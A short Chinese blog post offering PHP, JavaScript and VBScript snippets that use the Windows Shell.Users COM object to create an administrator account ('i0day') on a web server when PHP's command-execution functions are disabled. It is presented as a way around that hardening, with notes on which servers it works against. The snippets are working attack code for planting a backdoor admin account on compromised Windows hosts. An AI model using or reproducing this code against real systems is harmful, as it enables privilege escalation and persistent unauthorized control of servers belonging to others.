当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen

以及wscript.shell 组建被禁用的情况下,这也许是一个机会。

代码如下:

  1. <?php
  2. echo "<div align=center><b>PHP 版Shell.Users加管理员帐号</b></div>";
  3. $username="i0day";
  4. $password="i0day";
  5. $su = new COM("Shell.Users");
  6. $h=$su->create($username);
  7. $h->changePassword($password,"");
  8. $h->setting["AccountType"] = 3;//这句很重要可以把用户加入administrators 组,
  9. ?>

对apache 搭建的Web 服务器可以执行成功,IIS 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。

 

下面是 LCX 的代码:

JS:
  1. var o=new ActiveXObject( "Shell.Users" );
  2. z=o.create("i0day") ;
  3. z.changePassword("123456","")
  4. z.setting("AccountType")=3;
vbs:
  1. Set o=CreateObject( "Shell.Users" )
  2. Set z=o.create("i0day")
  3. z.changePassword "123456",""
  4. z.setting("AccountType")=3

转载文章请注明,转载自:小马's Blog https://www.i0day.com

本文链接: https://www.i0day.com/287.html